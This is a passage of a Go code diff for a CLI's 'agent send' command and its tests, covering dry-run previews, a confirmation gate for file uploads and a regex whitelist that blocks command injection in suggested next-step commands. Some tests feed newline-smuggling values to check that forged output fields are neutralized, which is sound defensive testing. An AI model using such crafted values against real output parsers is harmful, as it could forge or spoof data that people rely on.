f, _ := userFactory(t)
err := agentTaskCancelRun(&taskOptions{
Factory: f, Cmd: userLeafCmd(t, "agent", "task", "cancel"),
Ref: "fakescoped:agt_x", TaskID: "t1", As: "user",
})
if err == nil {
t.Fatal("task cancel with task_cancel=false should be blocked by the capability gate")
}
p, ok := errs.ProblemOf(err)
if !ok || p.Subtype != errs.Subtype("unsupported_capability") {
t.Fatalf("want unsupported_capability (capability gate answers first), got %+v", p)
}
}
// contains reports whether s appears in the slice.
func contains(ss []string, s string) bool {
for _, x := range ss {
if x == s {
return true
}
}
return false
}

View File

@@ -0,0 +1,10 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
// The example provider self-registers via init(); in production it is pulled in
// by the top-level agent package (blank-imported from cmd/build.go), not by
// cmd/agent. Several tests here exercise the real example scheme (example:echo /
// example:reporter), so register it explicitly for the test binary.
import _ "github.com/larksuite/cli/agent/example"

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@@ -0,0 +1,146 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"context"
"sync"
"testing"
iagent "github.com/larksuite/cli/internal/agent"
)
// scriptedHooks scripts a fake provider's behavior per test. Each hook maps to
// one Provider func field; an unset hook that gets called panics — a tripwire
// against a test reaching an unexpected provider path. This replaces the old
// pattern of driving the (removed) real-OAPI adapter through httpmock stubs:
// the command-layer contracts under test (envelope shape, watch exit codes,
// meta.next, pretty rendering, error propagation) are provider-neutral.
type scriptedHooks struct {
send func(in iagent.SendInput) (*iagent.AgentTask, error)
getTask func(taskID string) (*iagent.AgentTask, error)
listTasks func(contextID string) ([]iagent.TaskSummary, error)
listContexts func() ([]iagent.ContextSummary, error)
getContext func(ctxID string) (*iagent.ContextDetail, error)
deleteContext func(ctxID string) error
downloadArtifact func(taskID, artifactID string) (*iagent.ArtifactData, error)
}
// scripted is the package-level hook set shared by every scripted provider
// instance (the registry factory cannot be re-pointed per test, the hooks can).
var scripted scriptedHooks
// setScripted installs the hooks for one test and restores the empty (panic
// tripwire) set on cleanup.
func setScripted(t *testing.T, h scriptedHooks) {
t.Helper()
scripted = h
t.Cleanup(func() { scripted = scriptedHooks{} })
}
// newScriptedProvider builds a scripted *Provider. Its capability surface is
// fixed by which fields are wired (the framework derives the card from this):
// CancelTask is deliberately left unwired so task_cancel=false (the command
// layer's cancel gate is exercised via example:echo); everything else the
// command tests drive is wired, and FileInput=true so the --file gate/confirm
// path is reachable. Each wired func delegates to the per-test hook and panics
// if that hook was not set (tripwire against an unexpected provider path).
func newScriptedProvider() *iagent.Provider {
return &iagent.Provider{
Send: func(ctx context.Context, in iagent.SendInput) (*iagent.AgentTask, error) {
if scripted.send == nil {
panic("scripted provider: Send hook not set")
}
return scripted.send(in)
},
GetTask: func(ctx context.Context, taskID string) (*iagent.AgentTask, error) {
if scripted.getTask == nil {
panic("scripted provider: GetTask hook not set")
}
return scripted.getTask(taskID)
},
ListTasks: func(ctx context.Context, contextID string) ([]iagent.TaskSummary, error) {
if scripted.listTasks == nil {
panic("scripted provider: ListTasks hook not set")
}
return scripted.listTasks(contextID)
},
ListContexts: func(ctx context.Context) ([]iagent.ContextSummary, error) {
if scripted.listContexts == nil {
panic("scripted provider: ListContexts hook not set")
}
return scripted.listContexts()
},
GetContext: func(ctx context.Context, ctxID string) (*iagent.ContextDetail, error) {
if scripted.getContext == nil {
panic("scripted provider: GetContext hook not set")
}
return scripted.getContext(ctxID)
},
DeleteContext: func(ctx context.Context, ctxID string) error {
if scripted.deleteContext == nil {
panic("scripted provider: DeleteContext hook not set")
}
return scripted.deleteContext(ctxID)
},
DownloadArtifact: func(ctx context.Context, taskID, artifactID string) (*iagent.ArtifactData, error) {
if scripted.downloadArtifact == nil {
panic("scripted provider: DownloadArtifact hook not set")
}
return scripted.downloadArtifact(taskID, artifactID)
},
FileInput: true,
}
}
// fakescopedAllScopes is the full RequiredScopes set of the fakescoped test
// provider, sorted — the all-or-nothing preflight requires every one of these
// for any real API verb.
var fakescopedAllScopes = []string{
"fakescoped:agent_artifact:read",
"fakescoped:agent_attachment:write",
"fakescoped:agent_chat:read",
"fakescoped:agent_chat:write",
}
// fakeflowAgentIDSource is the AgentIDSource text of the fakeflow provider —
// the non-enumerable `agent list <scheme>` error surfaces it as the hint.
const fakeflowAgentIDSource = "在 fakeflow 测试控制台获取 agent_id形如 agt_xxx"
// registerScripted registers the two scripted schemes exactly once (Register
// panics on duplicates). Like the other fakes they leak into the package-level
// registry for the remaining tests of this package run — so no test in this
// package may assert an exact provider set or provider count.
//
// - fakeflow: instance kind, no RequiredScopes (preflight always passes) —
// the workhorse for send/task/context command-layer tests.
// - fakescoped: same behavior but declares a 4-scope RequiredScopes set, for
// the scope-preflight framework tests.
var registerScriptedOnce sync.Once
func registerScripted() {
registerScriptedOnce.Do(func() {
iagent.Register("fakeflow", iagent.ProviderInfo{
Factory: func(deps iagent.Deps, agentID string) (*iagent.Provider, error) {
return newScriptedProvider(), nil
},
Label: "test fake (scripted flow)",
AgentRefFormat: "fakeflow:<agent_id>",
AgentIDSource: fakeflowAgentIDSource,
Kind: iagent.KindInstance,
Identities: []iagent.IdentitySpec{{Type: iagent.IdentityUser}, {Type: iagent.IdentityBot}},
})
iagent.Register("fakescoped", iagent.ProviderInfo{
Factory: func(deps iagent.Deps, agentID string) (*iagent.Provider, error) {
return newScriptedProvider(), nil
},
Label: "test fake (scoped)",
AgentRefFormat: "fakescoped:<agent_id>",
AgentIDSource: "test only",
Kind: iagent.KindInstance,
RequiredScopes: fakescopedAllScopes,
Identities: []iagent.IdentitySpec{{Type: iagent.IdentityUser}, {Type: iagent.IdentityBot}},
})
})
}

341
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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"fmt"
"regexp"
"time"
"github.com/spf13/cobra"
"github.com/larksuite/cli/errs"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/output"
)
// sendOptions holds all inputs for `agent send <ref>`.
type sendOptions struct {
Factory *cmdutil.Factory
Cmd *cobra.Command
Ref string
Text string
Files []string
Params []string
ContextID string
TaskID string
DryRun bool
Yes bool
As string
Format string
}
// NewCmdAgentSend builds `agent send <agent_ref>`: send a message to a remote
// agent, starting a new task or continuing an existing one. `--dry-run`
// validates the inputs against the agent Card and prints the request preview
// without any API call (always available). A send fires and returns the
// current task immediately; poll progress with
// `agent task get <agent_ref> <task-id> --watch` (surfaced via meta.next).
// `--file` uploads local files to the remote agent — the content leaves this
// machine. Risk=write. runF, when non-nil, replaces the production run path
// (test seam).
func NewCmdAgentSend(f *cmdutil.Factory, runF func(*sendOptions) error) *cobra.Command {
opts := &sendOptions{Factory: f}
cmd := &cobra.Command{
Use: "send <agent_ref>",
Short: "Send a message to a remote agent (start a new task or continue an existing one)",
Long: "Send one message to the remote agent addressed by agent_ref. Without --context-id/--task-id it starts a new task; " +
"with --context-id (optionally --task-id) it continues the same multi-turn context (including replying to input_required/auth_required). " +
"--dry-run only validates locally and prints the request preview without calling the API. A send fires and returns the current task immediately; " +
"poll progress with agent task get <agent_ref> <task-id> --watch (see meta.next).",
Args: exactArgsWithUsage(1),
RunE: func(cmd *cobra.Command, args []string) error {
if err := validateFormat(opts.Format); err != nil {
return err
}
opts.Cmd = cmd
opts.Ref = args[0]
if runF != nil {
return runF(opts)
}
return agentSendRun(opts)
},
}
cmd.Flags().StringVar(&opts.Text, "text", "", "消息正文(必填)")
cmd.Flags().StringArrayVar(&opts.Files, "file", nil, "随消息外发的本地文件路径,可重复;文件会被上传到远端 provider内容离开本机")
cmd.Flags().StringArrayVar(&opts.Params, "param", nil, "agent 参数 key=value可重复据 card 的 parameters 决定)")
cmd.Flags().StringVar(&opts.ContextID, "context-id", "", "多轮上下文 id续发同一会话")
cmd.Flags().StringVar(&opts.TaskID, "task-id", "", "向已有任务续发(须与 --context-id 一起用)")
cmd.Flags().BoolVar(&opts.DryRun, "dry-run", false, "只做本地校验并打印请求预览,不调用 API")
cmd.Flags().BoolVar(&opts.Yes, "yes", false, "确认用 --file 把本地文件外发上传到远端(不加则 exit 10不上传")
cmd.Flags().StringVar(&opts.Format, "format", "json", formatFlagHelp)
cmd.Flags().String("jq", "", "用 jq 表达式过滤 JSON 输出")
if f != nil {
cmdutil.AddAPIIdentityFlag(cmd.Context(), cmd, f, &opts.As)
} else {
// f is nil only in construction-time unit tests; register a bare --as so
// the flag surface is still assertable without a Factory.
cmd.Flags().StringVar(&opts.As, "as", "", "identity type: user | bot")
}
cmdutil.SetRisk(cmd, cmdutil.RiskWrite)
return cmd
}
// agentSendRun validates the send inputs, resolves the provider, and either
// prints a dry-run preview or dispatches the message. The two client-side input
// guards (empty --text; --task-id without --context-id) run first so they never
// touch the network and hold even under a nil Factory. A send fires once
// and returns the current task immediately (exit 0); the caller polls progress
// via the meta.next `task get ... --watch` hint.
func agentSendRun(opts *sendOptions) error {
if opts.Text == "" {
return errs.NewValidationError(errs.SubtypeInvalidArgument, "--text 不能为空").
WithParam("--text").
WithHint(`补充 --text "<消息内容>" 后重发`)
}
if opts.TaskID != "" && opts.ContextID == "" {
return errs.NewValidationError(errs.SubtypeInvalidArgument,
"--task-id 需与 --context-id 一起使用").
WithParam("--task-id").
WithHint("--task-id 必须与 --context-id 同时提供")
}
f := opts.Factory
// Card lookup + --param validation + --dry-run are API-free:
// resolve without a configured client so they work — and surface validation
// errors as exit 2 — before the config gate, even when unconfigured.
p, _, err := resolveProviderNoClient(f, opts.Cmd, opts.Ref, opts.As)
if err != nil {
return err
}
r, err := iagent.ParseRef(opts.Ref)
if err != nil {
return wrapRefResolveError(err)
}
card, err := iagent.BuildCard(opts.Cmd.Context(), r.Scheme, r.AgentID, p)
if err != nil {
return err
}
params, err := parseAndValidateParams(opts.Params, card, opts.Ref)
if err != nil {
return err
}
in := iagent.SendInput{
Text: opts.Text,
Files: opts.Files,
Params: params,
ContextID: opts.ContextID,
TaskID: opts.TaskID,
}
// --dry-run is a client-side behavior: always available, never
// gated by the Card's dry_run capability, and never touches the API.
if opts.DryRun {
return emitDryRun(f, opts.Cmd, opts.Ref, in, opts.Format)
}
if len(in.Files) > 0 {
// An agent that does not declare file_input cannot take an upload, so
// --file against it is unsupported_capability — gated before any network
// access, so the user is not told "confirm the upload" for a send that
// would be rejected anyway.
if !card.Supports(iagent.CapFileInput) {
return capabilityError(opts.Ref, "send with --file", iagent.CapFileInput)
}
// --file exfiltrates local file content off this machine (the provider
// reads the file and uploads it to the remote agent). That is an
// irreversible, CLI-enforced high-risk write: a real send that would upload
// requires --yes, returning confirmation_required (exit 10) before any
// network access. dry-run above is exempt — it never uploads.
if !opts.Yes {
return errs.NewConfirmationRequiredError(errs.RiskHighRiskWrite, "agent send --file",
"--file 会把本地文件外发上传到远端 agent内容离开本机不可撤回").
WithHint("确认要外发这些文件后,加 --yes 重发")
}
}
// A real send calls the API, so it needs a configured client; resolve it now
// (not_configured / exit 3 here is correct for an actual API call).
pc, id, err := resolveProvider(f, opts.Cmd, opts.Ref, opts.As)
if err != nil {
return err
}
// Local scope preflight: after resolveProvider, before the API call.
// The check is all-or-nothing — any real API verb requires the provider's
// full scope set.
if err := preflightScopesForRef(f, id, opts.Ref); err != nil {
return err
}
task, err := pc.Send(opts.Cmd.Context(), in)
if err != nil {
return err
}
normalizeTask(task)
// A send fires and returns the current task immediately (exit 0). Progress is
// polled separately via the meta.next `task get <agent_ref> <task-id> --watch`
// hint — send no longer blocks on the task reaching a stop condition.
return emitTask(f, opts.Cmd, task, nextForTask(opts.Ref, task), opts.Format)
}
// emitDryRun writes the dry-run preview: {dry_run:true, would_send:{…}}
// reconstructed from the validated input, so a caller can inspect exactly what
// a real send would post without contacting the agent. format=pretty (no --jq)
// renders the same fields as key: value lines instead of the envelope.
func emitDryRun(f *cmdutil.Factory, cmd *cobra.Command, ref string, in iagent.SendInput, format string) error {
if format == "pretty" && jqExpr(cmd) == "" {
out := f.IOStreams.Out
fmt.Fprintln(out, "dry_run: true")
fmt.Fprintf(out, "agent_ref: %s\n", kvValue(ref))
fmt.Fprintf(out, "text: %s\n", truncateRunes(kvValue(in.Text), 120))
if len(in.Files) > 0 {
fmt.Fprintf(out, "files: %d\n", len(in.Files))
}
if len(in.Params) > 0 {
fmt.Fprintf(out, "params: %d\n", len(in.Params))
}
if in.ContextID != "" {
fmt.Fprintf(out, "context_id: %s\n", kvValue(in.ContextID))
}
if in.TaskID != "" {
fmt.Fprintf(out, "task_id: %s\n", kvValue(in.TaskID))
}
return nil
}
would := map[string]interface{}{
"agent_ref": ref,
"text": in.Text,
}
if len(in.Files) > 0 {
would["files"] = in.Files
}
if len(in.Params) > 0 {
would["params"] = in.Params
}
if in.ContextID != "" {
would["context_id"] = in.ContextID
}
if in.TaskID != "" {
would["task_id"] = in.TaskID
}
env := output.Envelope{
OK: true,
Identity: string(f.ResolvedIdentity),
Data: map[string]interface{}{
"dry_run": true,
"would_send": would,
},
Notice: output.GetNotice(),
}
if jq := jqExpr(cmd); jq != "" {
return output.JqFilter(f.IOStreams.Out, env, jq)
}
output.PrintJson(f.IOStreams.Out, env)
return nil
}
// nextIDPattern is the character whitelist for server-supplied identifiers
// (task_id / context_id) before they are interpolated into a meta.next command
// string: letters, digits, '_' and '-' only. It is deliberately stricter than
// validate.ResourceName — that check is a denylist aimed at URL-path safety and
// would pass shell metacharacters (spaces, ';', backticks, quotes), which are
// exactly what matters here: meta.next is defined as "AI executes this
// verbatim", so a server-controlled id is a command-injection surface.
var nextIDPattern = regexp.MustCompile(`^[A-Za-z0-9_-]+$`)
// safeNextID reports whether s may be interpolated into a meta.next command.
func safeNextID(s string) bool {
return nextIDPattern.MatchString(s)
}
// nextRefPattern is the whitelist for a user-supplied ref before it is
// interpolated into a meta.next command or a hint command string: the
// safeNextID charset on both sides of exactly one ':' (the <scheme>:<agent_id>
// shape ParseRef accepts, further restricted to command-safe characters). A
// ref is not server-controlled — the threat model is not injection but
// copy-paste breakage (a ref with spaces/quotes yields a command that cannot
// be executed verbatim), so a failing ref simply drops the command hint.
var nextRefPattern = regexp.MustCompile(`^[A-Za-z0-9_-]+:[A-Za-z0-9_-]+$`)
// safeNextRef reports whether ref may be interpolated into a meta.next / hint
// command string.
func safeNextRef(ref string) bool {
return nextRefPattern.MatchString(ref)
}
// nextForTask builds the meta.next[] hints for a send result: a terminal task
// suggests fetching its artifacts / detail, a still-running task the poll
// command, an input_required task the continue command, and an auth_required
// task the re-authorize flow (auth login, not a text continuation). AI callers use
// these to chain the next step without guessing the command shape, so every
// value interpolated here must pass its whitelist first: the ref (safeNextRef)
// and the task_id (safeNextID) each suppress the whole hint when they fail
// (prefer dropping the hint over risking injection); a failing context_id
// degrades to the <context_id> placeholder,
// which keeps the hint while interpolating nothing untrusted. A hint whose
// command carries <...> placeholders is marked Template so callers know it
// needs substitution before execution.
func nextForTask(ref string, task *iagent.AgentTask) []output.NextAction {
if !safeNextRef(ref) {
return nil
}
if task == nil || task.TaskID == "" || !safeNextID(task.TaskID) {
return nil
}
if task.State.ShouldStopPolling() {
if task.State == iagent.StateAuthRequired {
// auth_required is an agent-side task state — the end user must
// (re)authorize in the agent (see the SKILL state semantics), NOT a CLI scope error and
// NOT a text continuation like input_required. Point at the auth
// re-authorize flow instead of a text continuation. The concrete scopes are the
// agent's declared scope set (see the lark-agent skill's prerequisites), so --scope is a
// placeholder → Template. ref/task_id are already whitelisted above, so
// echoing the re-check command in the label is safe.
return []output.NextAction{{
Label: fmt.Sprintf("完成重新授权后重查任务(据该 agent 所需 scope 定;重查: lark-cli agent task get %s %s", ref, task.TaskID),
Command: `lark-cli auth login --scope "<required_scopes>"`,
Template: true,
}}
}
if task.State == iagent.StateInputRequired {
// A send that already needs input: point at the continue command
// against the same task/context. The --text value is
// always a placeholder, so this hint is a template — which is also why
// a missing or whitelist-failing context_id can degrade to the
// <context_id> placeholder instead of dropping the hint.
ctxID := task.ContextID
if ctxID == "" || !safeNextID(ctxID) {
ctxID = "<context_id>"
}
return []output.NextAction{{
Label: "补充输入后向同一任务续发",
Command: fmt.Sprintf("lark-cli agent send %s --context-id %s --task-id %s --text <你的答复>", ref, ctxID, task.TaskID),
Template: true,
}}
}
// Terminal: suggest reading the final detail / artifacts.
return []output.NextAction{{
Label: "查看任务详情与产物",
Command: fmt.Sprintf("lark-cli agent task get %s %s", ref, task.TaskID),
}}
}
return []output.NextAction{{
Label: "轮询任务直到停轮询条件(有界;到点未终止照此再 watch",
Command: fmt.Sprintf("lark-cli agent task get %s %s --watch --timeout %s", ref, task.TaskID, defaultWatchTimeout),
}}
}
// defaultWatchTimeout is the bounded poll window meta.next suggests for a
// still-running task: a safe default that avoids an unbounded --watch blocking
// forever on a long task and stops an AI caller from self-hammering. On expiry
// the poll returns the current state (exit 0) plus a fresh watch hint, so the
// caller re-watches in segments rather than blocking once. `--watch` used alone
// (--timeout 0) stays unbounded for backward compatibility.
const defaultWatchTimeout = 30 * time.Second

451
cmd/agent/send_test.go Normal file
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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"context"
"encoding/json"
"errors"
"strings"
"testing"
"github.com/spf13/cobra"
"github.com/larksuite/cli/errs"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
"github.com/larksuite/cli/internal/output"
)
// sendCmdCtx builds a `lark-cli agent send` leaf command whose CommandPath() is
// non-empty (required for content-safety scanning) and whose --as flag is
// explicitly set to bot so ResolveAs honors it verbatim.
func sendCmdCtx(t *testing.T) *cobra.Command {
t.Helper()
root := &cobra.Command{Use: "lark-cli"}
group := &cobra.Command{Use: "agent"}
leaf := &cobra.Command{Use: "send"}
root.AddCommand(group)
group.AddCommand(leaf)
leaf.Flags().String("as", "", "identity")
if err := leaf.Flags().Set("as", "bot"); err != nil {
t.Fatal(err)
}
leaf.SetContext(context.Background())
return leaf
}
// sendTestOpts wires a sendOptions against a real (test) Factory, addressing
// the scripted fakeflow agent agt_x under an explicit bot identity. The
// Factory's httpmock registry holds zero stubs, so any HTTP attempt fails the
// test — everything under test here is command-layer behavior over the
// scripted provider.
func sendTestOpts(t *testing.T) *sendOptions {
t.Helper()
registerScripted()
cfg := &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu}
f, _, _, _ := cmdutil.TestFactory(t, cfg)
return &sendOptions{
Factory: f,
Cmd: sendCmdCtx(t),
Ref: "fakeflow:agt_x",
As: "bot",
}
}
// TestSendRequiresText pins that an empty --text is a validation error
// (subtype invalid_argument) raised before any provider is built.
func TestSendRequiresText(t *testing.T) {
err := agentSendRun(&sendOptions{Ref: "example:agt_x", Text: ""})
if err == nil {
t.Fatal("missing --text should raise a validation error")
}
if !errs.IsValidation(err) {
t.Fatalf("want validation error, got %T", err)
}
p, ok := errs.ProblemOf(err)
if !ok || p.Subtype != errs.SubtypeInvalidArgument {
t.Fatalf("subtype should be invalid_argument, got %+v", p)
}
// hint contract: a missing --text must carry a copy-pasteable remediation
// hint, and the param uses the -- prefix.
if !strings.Contains(p.Hint, "--text") {
t.Errorf("hint should guide adding --text, got %q", p.Hint)
}
var verr *errs.ValidationError
if !errors.As(err, &verr) || verr.Param != "--text" {
t.Errorf("param should be --text, got %+v", verr)
}
}
// TestSendTaskIDRequiresContextID pins that --task-id without --context-id is a
// validation error, raised before any provider is built.
func TestSendTaskIDRequiresContextID(t *testing.T) {
err := agentSendRun(&sendOptions{Ref: "example:agt_x", Text: "x", TaskID: "t1"})
if err == nil {
t.Fatal("--task-id without --context-id should error")
}
if !errs.IsValidation(err) {
t.Fatalf("want validation error, got %T", err)
}
p, ok := errs.ProblemOf(err)
if !ok || p.Subtype != errs.SubtypeInvalidArgument {
t.Fatalf("subtype should be invalid_argument, got %+v", p)
}
// hint contract: state the next step clearly (--task-id must be provided
// together with --context-id).
if !strings.Contains(p.Hint, "--context-id") {
t.Errorf("hint should note it must be used with --context-id, got %q", p.Hint)
}
var verr *errs.ValidationError
if !errors.As(err, &verr) || verr.Param != "--task-id" {
t.Errorf("param should be --task-id, got %+v", verr)
}
}
// workingTask is the canonical non-terminal task the scripted Send returns for
// the happy-path tests.
func workingTask() *iagent.AgentTask {
return &iagent.AgentTask{TaskID: "chat_1", ContextID: "sess_1", State: iagent.StateWorking}
}
// TestSendPrettyFormat pins that `send --format pretty` renders the
// resulting task as key: value lines (previously the flag was registered but
// silently ignored).
func TestSendPrettyFormat(t *testing.T) {
opts := sendTestOpts(t)
opts.Text = "分析销售"
opts.Format = "pretty"
setScripted(t, scriptedHooks{send: func(iagent.SendInput) (*iagent.AgentTask, error) {
return workingTask(), nil
}})
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentSendRun(opts); err != nil {
t.Fatalf("send --format pretty should not error: %v", err)
}
text := string(out.Bytes())
for _, want := range []string{"state: working", "task_id: chat_1", "context_id: sess_1"} {
if !strings.Contains(text, want) {
t.Errorf("pretty output should contain %q, got:\n%s", want, text)
}
}
var env output.Envelope
if json.Unmarshal(out.Bytes(), &env) == nil && env.OK {
t.Errorf("pretty should not be a JSON envelope: %s", text)
}
}
// TestSendDryRunPrettyFormat pins that --dry-run also consumes --format pretty
// (key: value preview) instead of silently emitting JSON.
func TestSendDryRunPrettyFormat(t *testing.T) {
opts := sendTestOpts(t)
opts.Text = "分析销售"
opts.DryRun = true
opts.Format = "pretty"
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentSendRun(opts); err != nil {
t.Fatalf("dry-run pretty should not error: %v", err)
}
text := string(out.Bytes())
for _, want := range []string{"dry_run: true", "ref: fakeflow:agt_x", "text: 分析销售"} {
if !strings.Contains(text, want) {
t.Errorf("pretty output should contain %q, got:\n%s", want, text)
}
}
var env output.Envelope
if json.Unmarshal(out.Bytes(), &env) == nil && env.OK {
t.Errorf("pretty should not be a JSON envelope: %s", text)
}
}
// TestSendDryRunPrettyNeutralizesInjection pins F2: the dry-run pretty preview
// runs context_id/task_id through kvValue (like every other pretty face), so a
// value carrying a newline cannot forge an adjacent "key: value" field row.
func TestSendDryRunPrettyNeutralizesInjection(t *testing.T) {
opts := sendTestOpts(t)
opts.Text = "hi"
opts.DryRun = true
opts.Format = "pretty"
opts.ContextID = "ctx1\nstate: completed"
opts.TaskID = "task1\ndeleted: true"
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentSendRun(opts); err != nil {
t.Fatalf("dry-run pretty should not error: %v", err)
}
text := string(out.Bytes())
// The raw newline must not survive into a forged adjacent row.
if strings.Contains(text, "context_id: ctx1\nstate: completed") {
t.Errorf("context_id newline not neutralized, forged a field row:\n%s", text)
}
if strings.Contains(text, "task_id: task1\ndeleted: true") {
t.Errorf("task_id newline not neutralized, forged a field row:\n%s", text)
}
// kvValue collapses the newline to a space, keeping the value on one line.
if !strings.Contains(text, "context_id: ctx1 state: completed") {
t.Errorf("context_id should collapse to one line, got:\n%s", text)
}
if !strings.Contains(text, "task_id: task1 deleted: true") {
t.Errorf("task_id should collapse to one line, got:\n%s", text)
}
}
// TestSendNoParamsRequired pins card v2: the scripted card declares no
// parameters, so a send without any --param passes card validation — asserted
// via --dry-run so no provider Send fires. A malformed --param is still a
// validation error.
func TestSendNoParamsRequired(t *testing.T) {
opts := sendTestOpts(t)
opts.Text = "分析销售"
opts.Params = nil
opts.DryRun = true
if err := agentSendRun(opts); err != nil {
t.Fatalf("card has no required params, send without --param should pass validation: %v", err)
}
opts2 := sendTestOpts(t)
opts2.Text = "分析销售"
opts2.Params = []string{"noequals"} // a --param without '=' should still raise validation
opts2.DryRun = true
err := agentSendRun(opts2)
if err == nil {
t.Fatal("malformed --param should error")
}
if !errs.IsValidation(err) {
t.Fatalf("want validation error, got %T", err)
}
}
// TestSendUnknownParamRejected pins, against an empty-parameters card, that
// any --param key is unknown → invalid_argument with a hint pointing at
// `agent card`, raised before any provider Send (asserted via --dry-run with
// no send hook installed).
func TestSendUnknownParamRejected(t *testing.T) {
opts := sendTestOpts(t)
opts.Text = "分析销售"
opts.Params = []string{"app_id=app_1"}
opts.DryRun = true
err := agentSendRun(opts)
if err == nil {
t.Fatal("card did not declare app_id, --param app_id should error")
}
if !errs.IsValidation(err) {
t.Fatalf("want validation error, got %T", err)
}
p, ok := errs.ProblemOf(err)
if !ok || p.Subtype != errs.SubtypeInvalidArgument {
t.Fatalf("subtype should be invalid_argument, got %+v", p)
}
if !strings.Contains(p.Hint, "agent card") {
t.Fatalf("hint should point to agent card, got %q", p.Hint)
}
}
// TestSendDryRun pins that --dry-run prints a would_send preview and never
// calls the provider (no send hook installed → a Send would panic).
func TestSendDryRun(t *testing.T) {
opts := sendTestOpts(t)
opts.Text = "分析销售"
opts.DryRun = true
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentSendRun(opts); err != nil {
t.Fatalf("dry-run should not error: %v", err)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("dry-run output should be valid envelope JSON: %v (%s)", err, string(out.Bytes()))
}
if !env.OK {
t.Errorf("ok should be true: %+v", env)
}
data, ok := env.Data.(map[string]interface{})
if !ok {
t.Fatalf("data should be an object, got %T", env.Data)
}
if data["dry_run"] != true {
t.Errorf("data.dry_run should be true, got %v", data["dry_run"])
}
would, ok := data["would_send"].(map[string]interface{})
if !ok {
t.Fatalf("data.would_send should be an object, got %T", data["would_send"])
}
if would["text"] != "分析销售" {
t.Errorf("would_send.text should echo the text, got %v", would["text"])
}
}
// TestSendStartsTask pins the happy path: a single Send fires and returns the
// submitted / working task in a success envelope immediately (no polling), with
// a meta.next hint pointing at task get --watch.
func TestSendStartsTask(t *testing.T) {
opts := sendTestOpts(t)
opts.Text = "分析销售"
var gotText string
setScripted(t, scriptedHooks{send: func(in iagent.SendInput) (*iagent.AgentTask, error) {
gotText = in.Text
return workingTask(), nil
}})
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentSendRun(opts); err != nil {
t.Fatalf("send should not error: %v", err)
}
if gotText != "分析销售" {
t.Errorf("provider should receive the original text, got %q", gotText)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("output should be valid envelope JSON: %v (%s)", err, string(out.Bytes()))
}
data, _ := env.Data.(map[string]interface{})
if data["task_id"] != "chat_1" {
t.Errorf("task_id should be chat_1, got %v", data["task_id"])
}
if data["state"] != string(iagent.StateWorking) {
t.Errorf("state should be working, got %v", data["state"])
}
// meta.next should suggest polling / continuing.
if !strings.Contains(string(out.Bytes()), `"next"`) {
t.Errorf("non-terminal should provide meta.next follow-up: %s", string(out.Bytes()))
}
}
// TestSendSendError surfaces a provider Send failure unchanged.
func TestSendSendError(t *testing.T) {
opts := sendTestOpts(t)
opts.Text = "x"
setScripted(t, scriptedHooks{send: func(iagent.SendInput) (*iagent.AgentTask, error) {
return nil, errs.NewAPIError(errs.SubtypeUnknown, "app ticket invalid").WithCode(99991663)
}})
if err := agentSendRun(opts); err == nil {
t.Fatal("Send error should propagate")
}
}
// TestSendInvalidRef surfaces a malformed ref as a validation error after the
// text/task-id guards pass.
func TestSendInvalidRef(t *testing.T) {
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu})
err := agentSendRun(&sendOptions{Ref: "no-colon", Text: "x", Cmd: sendCmdCtx(t), As: "bot", Factory: f})
if err == nil {
t.Fatal("malformed ref should error")
}
if !errs.IsValidation(err) {
t.Fatalf("want validation error, got %T", err)
}
}
// TestNewCmdAgentSend_WriteRiskAndArgs pins ExactArgs(1), write risk, and the
// presence of the send-specific flags.
func TestNewCmdAgentSend_WriteRiskAndArgs(t *testing.T) {
cmd := NewCmdAgentSend(nil, nil)
if level, ok := cmdutil.GetRisk(cmd); !ok || level != cmdutil.RiskWrite {
t.Errorf("agent send should be marked write risk, got level=%q ok=%v", level, ok)
}
if err := cmd.Args(cmd, []string{}); err == nil {
t.Error("agent send missing ref should raise an args error (ExactArgs 1)")
}
if err := cmd.Args(cmd, []string{"example:x"}); err != nil {
t.Errorf("agent send with a single ref should be valid: %v", err)
}
for _, name := range []string{"text", "file", "param", "context-id", "task-id", "dry-run", "as", "format", "jq"} {
if cmd.Flags().Lookup(name) == nil {
t.Errorf("agent send should have --%s flag", name)
}
}
if cmd.Flags().Lookup("wait") != nil {
t.Error("agent send --wait should be removed (polling goes through task get --watch)")
}
// The --file help must point out that files are sent off to the remote
// provider (file-egress requirement).
fileFlag := cmd.Flags().Lookup("file")
if fileFlag != nil && !strings.Contains(fileFlag.Usage, "外发") && !strings.Contains(fileFlag.Usage, "上传") {
t.Errorf("--file help should note files are sent out to the remote provider, got %q", fileFlag.Usage)
}
}
// TestNewCmdAgentSend_RunFOverride confirms the injected runF hook is used
// instead of the production path (construction-time seam).
func TestNewCmdAgentSend_RunFOverride(t *testing.T) {
called := false
var captured *sendOptions
cmd := NewCmdAgentSend(nil, func(opts *sendOptions) error {
called = true
captured = opts
return nil
})
cmd.SetArgs([]string{"example:agt_x", "--text", "hi"})
cmd.SetContext(context.Background())
if err := cmd.Execute(); err != nil {
t.Fatalf("execute should not error: %v", err)
}
if !called {
t.Fatal("runF should be called")
}
if captured.Ref != "example:agt_x" || captured.Text != "hi" {
t.Errorf("opts not populated correctly: %+v", captured)
}
}
// TestSend_FileRequiresYes pins the --file exfil confirmation gate: a real send
// carrying --file to a provider that supports file upload (the scripted card has
// file_input=true) requires --yes, so without it the command returns
